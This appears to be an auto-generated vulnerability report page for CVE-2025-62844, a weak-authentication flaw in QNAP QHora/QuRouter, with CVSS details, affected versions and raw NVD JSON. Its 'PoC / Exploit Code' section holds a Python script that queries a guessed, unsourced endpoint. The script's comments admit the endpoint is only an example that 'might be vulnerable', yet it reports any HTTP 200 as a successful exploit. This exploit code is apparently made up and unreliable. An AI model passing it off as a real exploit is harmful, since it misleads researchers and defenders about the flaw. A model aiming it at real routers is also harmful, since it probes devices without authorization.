Security Vulnerability Report
中文
CVE-2025-62844 CVSS 5.5 MEDIUM

CVE-2025-62844

Published: 2026-03-20 17:16:42
Last Modified: 2026-04-14 14:24:29
Source: [email protected]

Description

A weak authentication vulnerability has been reported to affect QHora. If an attacker gains local network access, they can then exploit the vulnerability to gain sensitive information. We have already fixed the vulnerability in the following version: QuRouter 2.6.2.007 and later

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:qnap:qurouter:2.6.0.239:build_20250625:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:qnap:qurouter:2.6.0.688:build_20250818:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:qnap:qurouter:2.6.1.028:build_20251001:*:*:*:*:*:* - VULNERABLE
QuRouter < 2.6.2.007

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2025-62844: QHora Weak Authentication Description: Attempts to access sensitive configuration via weak auth on local network. """ import requests import sys def exploit(target_ip): # Example endpoint that might be vulnerable due to weak authentication # Adjust the endpoint/port based on actual technical analysis url = f"http://{target_ip}:8080/api/v1/internal/sensitive_config" headers = { "User-Agent": "Mozilla/5.0", "Accept": "application/json" } print(f"[*] Attempting to exploit weak auth on {target_ip}...") try: # In a real weak auth scenario, we might send a request with low-priv creds # or no creds where the system incorrectly defaults to allowing access. response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Sensitive information leaked:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print("[-] The target may be patched or not vulnerable.") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": if len(sys.argv) != 2: print(f"Usage: python {sys.argv[0]} <target_ip>") sys.exit(1) exploit(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62844", "sourceIdentifier": "[email protected]", "published": "2026-03-20T17:16:42.387", "lastModified": "2026-04-14T14:24:28.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weak authentication vulnerability has been reported to affect QHora. If an attacker gains local network access, they can then exploit the vulnerability to gain sensitive information.\n\nWe have already fixed the vulnerability in the following version:\nQuRouter 2.6.2.007 and later"}, {"lang": "es", "value": "Se ha reportado una vulnerabilidad de autenticación débil que afecta a QHora. Si un atacante obtiene acceso a la red local, puede entonces explotar la vulnerabilidad para obtener información sensible.\n\nYa hemos corregido la vulnerabilidad en la siguiente versión:\nQuRouter 2.6.2.007 y posteriores"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1390"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qurouter:2.6.0.239:build_20250625:*:*:*:*:*:*", "matchCriteriaId": "6BEA7459-EA28-4A5F-ABB4-F00661760FA4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qurouter:2.6.0.688:build_20250818:*:*:*:*:*:*", "matchCriteriaId": "71BB01EA-6A7B-46CF-A2F7-41DDBA5A17ED"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qurouter:2.6.1.028:build_20251001:*:*:*:*:*:*", "matchCriteriaId": "F61A82A3-3A3E-42B6-B7F6-B5FAF37CCC80"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-26-12", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.